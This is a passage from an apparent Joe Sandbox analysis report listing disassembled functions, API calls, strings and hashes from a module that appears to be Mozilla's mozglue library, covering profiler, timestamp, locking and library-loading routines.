                                                                                                      • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                      • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                      • API String ID: 16519850-1833026159
                                                                                                      • Opcode ID: c6695c5a278b20c64bd4f3580f82d5bd16bae4d0532f2a9725b45961cb0faf78
                                                                                                      • Instruction ID: 53ff84d36d6a8559c1ec504228a1f5bc6e449ffd4d5889003e05182dea30da88
                                                                                                      • Opcode Fuzzy Hash: c6695c5a278b20c64bd4f3580f82d5bd16bae4d0532f2a9725b45961cb0faf78
                                                                                                      • Instruction Fuzzy Hash: 6051E7365042219FEB009BE9DC0A7A67FBCFB47358F1A4519E93983B81DB756804C7A3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFA5E9D
                                                                                                        • Part of subcall function 6CFB5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CFB56EE,?,00000001), ref: 6CFB5B85
                                                                                                        • Part of subcall function 6CFB5B50: EnterCriticalSection.KERNEL32(6D01F688,?,?,?,6CFB56EE,?,00000001), ref: 6CFB5B90
                                                                                                        • Part of subcall function 6CFB5B50: LeaveCriticalSection.KERNEL32(6D01F688,?,?,?,6CFB56EE,?,00000001), ref: 6CFB5BD8
                                                                                                        • Part of subcall function 6CFB5B50: GetTickCount64.KERNEL32 ref: 6CFB5BE4
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA5EAB
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA5EB8
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFA5ECF
                                                                                                      • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CFA6017
                                                                                                        • Part of subcall function 6CF94310: moz_xmalloc.MOZGLUE(00000010,?,6CF942D2), ref: 6CF9436A
                                                                                                        • Part of subcall function 6CF94310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CF942D2), ref: 6CF94387
                                                                                                      • moz_xmalloc.MOZGLUE(00000004), ref: 6CFA5F47
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFA5F53
                                                                                                      • GetCurrentThread.KERNEL32 ref: 6CFA5F5C
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFA5F66
                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CFA5F7E
                                                                                                      • moz_xmalloc.MOZGLUE(00000024), ref: 6CFA5F27
                                                                                                        • Part of subcall function 6CFACA10: mozalloc_abort.MOZGLUE(?), ref: 6CFACAA2
                                                                                                      • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFA55E1), ref: 6CFA5E8C
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFA55E1), ref: 6CFA605D
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFA55E1), ref: 6CFA60CC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                      • String ID: GeckoMain
                                                                                                      • API String ID: 3711609982-966795396
                                                                                                      • Opcode ID: c82c09c73c797af52ce9acd494c705f0705920cad14d452405fe50d1897b04ea
                                                                                                      • Instruction ID: 3aabea07306dc2083978a42830c921c79a13894b79e7ef3bc5d46305220f220f
                                                                                                      • Opcode Fuzzy Hash: c82c09c73c797af52ce9acd494c705f0705920cad14d452405fe50d1897b04ea
                                                                                                      • Instruction Fuzzy Hash: C071ACB1A04740DFD700DFA9C880B6ABBF0BF5A304F14496DE59687B42D731E989CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CF931C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CF93217
                                                                                                        • Part of subcall function 6CF931C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CF93236
                                                                                                        • Part of subcall function 6CF931C0: FreeLibrary.KERNEL32 ref: 6CF9324B
                                                                                                        • Part of subcall function 6CF931C0: __Init_thread_footer.LIBCMT ref: 6CF93260
                                                                                                        • Part of subcall function 6CF931C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CF9327F
                                                                                                        • Part of subcall function 6CF931C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CF9328E
                                                                                                        • Part of subcall function 6CF931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CF932AB
                                                                                                        • Part of subcall function 6CF931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CF932D1
                                                                                                        • Part of subcall function 6CF931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CF932E5
                                                                                                        • Part of subcall function 6CF931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CF932F7
                                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CFA9675
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA9697
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CFA96E8
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CFA9707
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA971F
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CFA9773
                                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CFA97B7
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA97D0
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA97EB
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CFA9824
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                      • API String ID: 3361784254-3880535382
                                                                                                      • Opcode ID: eb2f1582051ef2ef33b254c3315e916cf2c61d23181bf55941ddf979e843d491
                                                                                                      • Instruction ID: fb323f4c5a00cadd4f6077890555f26f65738f06883c94ac11bdcd2d2cfb0115
                                                                                                      • Opcode Fuzzy Hash: eb2f1582051ef2ef33b254c3315e916cf2c61d23181bf55941ddf979e843d491
                                                                                                      • Instruction Fuzzy Hash: F061C376604201DBDF00CFE5DC85B9ABBF9FB4A314F104229E92993790DB31E955CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InitializeCriticalSection.KERNEL32(6D01F618), ref: 6CFF6694
                                                                                                      • GetThreadId.KERNEL32(?), ref: 6CFF66B1
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFF66B9
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CFF66E1
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F618), ref: 6CFF6734
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFF673A
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F618), ref: 6CFF676C
                                                                                                      • GetCurrentThread.KERNEL32 ref: 6CFF67FC
                                                                                                      • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CFF6868
                                                                                                      • RtlCaptureContext.NTDLL ref: 6CFF687F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                      • String ID: WalkStack64
                                                                                                      • API String ID: 2357170935-3499369396
                                                                                                      • Opcode ID: 9a0b954fc703612b338043260b76799a2bb7a6cf0478d13596e1787cc88a46f9
                                                                                                      • Instruction ID: c1ca51abb2ff40f216a6464dafa9c58aa4781ba3d82afe12529dc8583caba755
                                                                                                      • Opcode Fuzzy Hash: 9a0b954fc703612b338043260b76799a2bb7a6cf0478d13596e1787cc88a46f9
                                                                                                      • Instruction Fuzzy Hash: 0D518772909301AFEB11CF64C845B5BBBF4FF8A714F00492DF9A997650DB70A905CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFDDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDDE73
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDDF7D
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDDF8A
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDDFC9
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDDFF7
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDE000
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CFA4A68), ref: 6CFDDE7B
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CFA4A68), ref: 6CFDDEB8
                                                                                                      • free.MOZGLUE(00000000,?,6CFA4A68), ref: 6CFDDEFE
                                                                                                      • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CFDDF38
                                                                                                      Strings
                                                                                                      • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CFDE00E
                                                                                                      • [I %d/%d] locked_profiler_stop, xrefs: 6CFDDE83
                                                                                                      • <none>, xrefs: 6CFDDFD7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                      • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                      • API String ID: 1281939033-809102171
                                                                                                      • Opcode ID: 924bdc62ff1d645c5af641e1015620198eb6b552ae70ed94a32d6c9daf5c9c63
                                                                                                      • Instruction ID: a00764e9b745ba7a5d66bec12e101b345b368d50a9f263ca15cfc896fa73033a
                                                                                                      • Opcode Fuzzy Hash: 924bdc62ff1d645c5af641e1015620198eb6b552ae70ed94a32d6c9daf5c9c63
                                                                                                      • Instruction Fuzzy Hash: C74128326012119BEB109FE4DC057AE7BB9FB8630DF090019E92997B41CB31A905CBF3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFED4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFED4F0
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFED4FC
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFED52A
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFED530
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFED53F
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFED55F
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFED585
                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CFED5D3
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFED5F9
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFED605
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFED652
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFED658
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFED667
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFED6A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2206442479-0
                                                                                                      • Opcode ID: d191b9dc6edf6eda80977fc381be1f83a2c7ed5251aacf3de75ba0c34d9c5870
                                                                                                      • Instruction ID: a16fdc9a62dd494492567cf6cba791750ff7d47bb853a56c0d6f54ee7699486c
                                                                                                      • Opcode Fuzzy Hash: d191b9dc6edf6eda80977fc381be1f83a2c7ed5251aacf3de75ba0c34d9c5870
                                                                                                      • Instruction Fuzzy Hash: AC517D75504705EFC704CF65C884A9ABBF4FF8A318F108A2EE85A87711DB30E945CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFB5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CFB56D1
                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CFB56E9
                                                                                                      • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CFB56F1
                                                                                                      • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CFB5744
                                                                                                      • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CFB57BC
                                                                                                      • GetTickCount64.KERNEL32 ref: 6CFB58CB
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F688), ref: 6CFB58F3
                                                                                                      • __aulldiv.LIBCMT ref: 6CFB5945
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F688), ref: 6CFB59B2
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6D01F638,?,?,?,?), ref: 6CFB59E9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                      • String ID: MOZ_APP_RESTART
                                                                                                      • API String ID: 2752551254-2657566371
                                                                                                      • Opcode ID: dd103494481fc78685a0b5fcdc3346207a7d11323583074e1fd64f1391135712
                                                                                                      • Instruction ID: 8b8ecfc8cf253165d567eefd760068911dcb0b523577a09074f75d897bd28175
                                                                                                      • Opcode Fuzzy Hash: dd103494481fc78685a0b5fcdc3346207a7d11323583074e1fd64f1391135712
                                                                                                      • Instruction Fuzzy Hash: 61C1AC729083409FDB05CF68C84176ABBF5FFCA714F058A1DE8D8A7661D734A885CB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFDEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEC84
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDEC8C
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDECA1
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDECAE
                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CFDECC5
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDED0A
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CFDED19
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6CFDED28
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFDED2F
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDED59
                                                                                                      Strings
                                                                                                      • [I %d/%d] profiler_ensure_started, xrefs: 6CFDEC94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                      • String ID: [I %d/%d] profiler_ensure_started
                                                                                                      • API String ID: 4057186437-125001283
                                                                                                      • Opcode ID: a722da199dffa392898a15919966c1f1040942c584843f10e598a86d4f04cc38
                                                                                                      • Instruction ID: eb871feb8f980f77029fcf15222cf3424bcbea879fe1ab8a121a44bc4f8bf8e0
                                                                                                      • Opcode Fuzzy Hash: a722da199dffa392898a15919966c1f1040942c584843f10e598a86d4f04cc38
                                                                                                      • Instruction Fuzzy Hash: 8321E572400114AFEB009FE4DC05BAABB79FB4726CF194214FC2897741DB31A805CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CF9EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF9EB83
                                                                                                      • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CFDB392,?,?,00000001), ref: 6CFD91F4
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                      • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                      • API String ID: 3790164461-3347204862
                                                                                                      • Opcode ID: 34359ad02957c1e0b382cb08ba7ff7fe852eefd5ae60e904ef62ab403aa626de
                                                                                                      • Instruction ID: 58ce0b2ba02baf397f0f2f43d102a89918c3d44bf1f6e633525eeaf2c8f249d9
                                                                                                      • Opcode Fuzzy Hash: 34359ad02957c1e0b382cb08ba7ff7fe852eefd5ae60e904ef62ab403aa626de
                                                                                                      • Instruction Fuzzy Hash: F7B1D5B0A01209DBEF04CFD4C8557EEBBB5BF85318F154019D406ABB84DB31AA45CBE2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFBC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CFBC5A3
                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6CFBC9EA
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CFBC9FB
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CFBCA12
